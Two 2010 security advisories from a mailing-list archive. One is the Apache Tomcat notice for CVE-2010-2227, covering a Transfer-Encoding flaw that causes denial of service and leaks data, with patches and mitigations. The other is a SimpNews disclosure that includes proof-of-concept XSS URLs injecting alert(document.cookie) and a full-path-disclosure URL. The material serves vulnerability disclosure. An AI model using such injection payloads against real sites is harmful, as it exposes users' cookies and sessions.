[SECURITY] CVE-2010-2227: Apache Tomcat Remote Denial Of Service and Information Disclosure Vulnerability

2010-07-09 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2010-2227: Apache Tomcat Remote Denial Of Service and Information
   Disclosure Vulnerability

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Tomcat 5.5.0 to 5.5.29
Tomcat 6.0.0 to 6.0.27
Tomcat 7.0.0

Note: 7.0.0 is still beta.
Note: The unsupported Tomcat 3.x, 4.x and 5.0.x versions may also be
affected.

Description:
Several flaws in the handling of the 'Transfer-Encoding' header were
found that prevented the recycling of a buffer. A remote attacker could
trigger this flaw which would cause subsequent requests to fail and/or
information to leak between requests.

Mitigation:
- - Tomcat 5.5.x users should upgrade to 5.5.30 or apply this patch:
  http://svn.apache.org/viewvc?view=revision&revision=959428
- - Tomcat 6.0.x users should upgrade to 6.0.28 or apply this patch:
  http://svn.apache.org/viewvc?view=revision&revision=958977
- - Tomcat 7.0.x users should upgrade to 7.0.1 when released or apply this
patch:
  http://svn.apache.org/viewvc?view=revision&revision=958911

- - All users may mitigate this flaw by running Tomcat behind a reverse
proxy (such as Apache httpd 2.2) that rejects invalid values for
Transfer-Encoding.

Credit:
This issue was discovered by Steve Jones

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html

The Apache Tomcat Security Team
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJMN07EAAoJEBDAHFovYFnn8U4P/2wJuP+JYoqeIpPJwK7stqfd
jKO01S999v9lnYpIfPXEaFgGXTedo7BYo4X+OTuR7OLiAR6DVa1PhVzDd4bzoeW3
sY9zbOiXEvM6Ps5eVPJuR9P4YVs8O6qeLA8UKWV28KIFX/N4hZ5KAAJTSdlP0DuB
2dLB8cWtldTJrYmLVXbG//1j4S/k/PfHU/+MpZRIs8GWUPOpCxrWyvg+rTQN2zWP
iKsUzEEfXyoeHJmD/KM7OTbxfmL0HsUgeHPUBi4A6zPZt6e8614MZcr9FuwK4BBt
+8lCrZhP9XgxbTqp2qMRtF49ObK2gWVav3o2uruaK6NDvGLrAjgvV+mCxKVx6yjl
i9kL1K8S1FIO2eqTdVrQulega2NatYJxyG2ofDsb92+6mio/vLYKBxtI4bworQli
Vf/EWmYCuueKrZzde6k+HWhy9cR8JFdws/EGZ5UUaMiVB5Rvk5jPHwBgJDUdnSqC
75HEQBTsowsVKLGuHSnIjkg4B0IiAT6COsOsTfXsUSUn8f95a40GTynE70xvL0Ii
17wr2aK3fC8z9XG3Grbx1s4KiIW41iPBDSh9I7WWSQ+hhq+VHsBKJoubQsWW4qVb
sRuMx6kHTRq1DqEiTtAQFdMiE1oyDNB1ro99j44LH4azJvi5hS5S5R5QOyt9PshE
x6KDdVdqZF3+d64YwjtE
=KHN9
-END PGP SIGNATURE-




Vulnerabilities in SimpNews

2010-07-09 Thread MustLive

Hello Bugtraq!

I want to warn you about security vulnerabilities in SimpNews.

-
Advisory: Vulnerabilities in SimpNews
-
URL: http://websecurity.com.ua/4245/
-
Affected products: SimpNews V2.47.03 and previous versions.
-
Timeline:

26.10.2009 - found vulnerabilities.
29.05.2010 - announced at my site.
30.05.2010 - informed developer.
31.05.2010 - developer released SimpNews v2.48. In version 2.48 the
developer fixed all mentioned vulnerabilities.
09.07.2010 - disclosed at my site.
-
Details:

These are Full path disclosure and Cross-Site Scripting vulnerabilities.

Full path disclosure:

http://site/simpnews/news.php?lang=1&layout=layout2&sortorder=0&category=1

XSS:

http://site/simpnews/news.php?layout=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/simpnews/news.php?lang=en&layout=layout2&sortorder=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua